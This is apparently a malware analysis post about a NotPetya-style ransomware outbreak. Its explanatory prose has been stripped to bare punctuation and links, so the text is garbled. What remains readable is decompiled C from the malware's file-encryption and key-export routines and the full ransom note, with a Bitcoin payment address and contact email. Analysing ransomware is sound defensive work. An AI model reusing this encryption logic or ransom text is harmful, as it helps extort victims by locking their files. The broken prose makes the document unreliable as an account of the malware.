, . .
, . 10-12 .
, .
( 13-00 27- ), , , . .
5- .
.
→ h**ps://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 — .
→ h**ps://retdec.com/decompilation-run/ — .
— , windows , .
.
1. 1 (0x100000) . — 1- :
if (v6 <= lpFileMappingAttributes) {
if (lpFileSize <= 0x100000) {
dwNumberOfBytesToMap = (struct _LARGE_INTEGER *)lpFileSize;
pdwDataLen = dwNumberOfBytesToMap;
dwMaximumSizeLow = 16 * (lpFileSize / 16 + 1);
hFileMappingObject = CreateFileMappingW((char *)hFile2, (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes, 4, lpFileMappingAttributes, dwMaximumSizeLow, (int16_t *)lpFileMappingAttributes);
dwFileOffsetHigh = lpFileMappingAttributes;
if ((int32_t)hFileMappingObject != dwFileOffsetHigh) {
pbData = MapViewOfFile(hFileMappingObject, 6, dwFileOffsetHigh, dwFileOffsetHigh, (int32_t)dwNumberOfBytesToMap);
v4 = (int32_t)pbData;
hFile2 = v4;
hHash = lpFileMappingAttributes;
if (v4 != hHash) {
hKey = *(int32_t *)(a2 + 20);
v5 = CryptEncrypt(hKey, hHash, (int32_t)(struct _SECURITY_ATTRIBUTES *)1 % 2 != 0, hHash, pbData, (int32_t *)&pdwDataLen, dwMaximumSizeLow);
if (v5) {
FlushViewOfFile((char *)hFile2, (int32_t)pdwDataLen);
}
UnmapViewOfFile((char *)hFile2);
}
CloseHandle(hFileMappingObject);
}
handleClosed = CloseHandle(hFile);
g8 = v1;
g4 = v3;
return (char *)handleClosed;
}
}
pdwDataLen = (struct _LARGE_INTEGER *)0x100000;
struct _SECURITY_ATTRIBUTES * v8 = (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes;
lpFileMappingAttributes2 = v8;
v7 = v8;
dwNumberOfBytesToMap2 = (struct _LARGE_INTEGER *)0x100000;
dwMaximumSizeLow = 0x100000;
}
, .
2. . README.TXT , , ( ). .
Ooops, your important files are encrypted.
If you see this text, then your files are no longer accessible, because
they have been encrypted. Perhaps you are busy looking for a way to recover
your files, but don't waste your time. Nobody can recover your files without
our decryption service.
We guarantee that you can recover all your files safely and easily.
All you need to do is submit the payment and purchase the decryption key.
Please follow the instructions:
1. Send $300 worth of Bitcoin to following address:
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
2. Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net.
Your personal installation key:
AQIAAA5mAAAApAAAuoxiZtYONU+IOA/XL0Yt/lsBOfNmT9WBDYQ8LsRCWJbQ3iTs
Ka1mVGVmMpJxO+bQmzmEwwiy1Mzsw2hVilFIK1kQoC8lEZPvV06HFGBeIaSAfrf6
6kxuvs7U/fDP6RUWt3hGT4KzUzjU7NhIYKg2crEXuJ9gmgIE6Rq1hSv6xpscqvvV
Fg4k0EHN3TS9hSOWbZXXsDe9H1r83M4LDHA+NJmVM7CKPCRFc82UIQNZY/CDz/db
1IknT/oiBDlDH8fHDr0Z215M3lEy/K7PC4NSk9c+oMP1rLm3ZeL0BbGTBPAZvTLI
LkKYVqRSYpN+Mp/rBn6w3+q15DNRlbGjm1i+ow==
.
void function_10001c7f(void) {
int32_t dwFlags = 0;
int32_t hKey = *(int32_t *)(g3 + 20);
int32_t pdwDataLen = 0;
int32_t v1;
if (!CryptExportKey(hKey, *(int32_t *)(g3 + 12), 1, 0, NULL, &pdwDataLen)) {
g3 = (int32_t)NULL;
g4 = v1;
return;
}
char * memoryHandle = LocalAlloc(64, pdwDataLen);
if ((int32_t)memoryHandle == dwFlags) {
g3 = (int32_t)NULL;
g4 = v1;
return;
}
int32_t hExpKey = *(int32_t *)(g3 + 12);
int32_t hKey2 = *(int32_t *)(g3 + 20);
if (CryptExportKey(hKey2, hExpKey, 1, dwFlags, memoryHandle, &pdwDataLen)) {
int32_t pcchString = dwFlags;
bool v2 = CryptBinaryToStringW(memoryHandle, pdwDataLen, 1, (int16_t *)dwFlags, &pcchString);
if (v2) {
char * memoryHandle2 = LocalAlloc(64, 2 * pcchString);
int32_t hMem = (int32_t)memoryHandle2;
if (hMem == dwFlags) {
LocalFree(memoryHandle);
g3 = (int32_t)NULL;
g4 = v1;
return;
}
CryptExportKey — 1, . README.TXT.
— , ? . , .
, , .
— , , , . 160-180 . , . 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX 10000$. , , , .
. .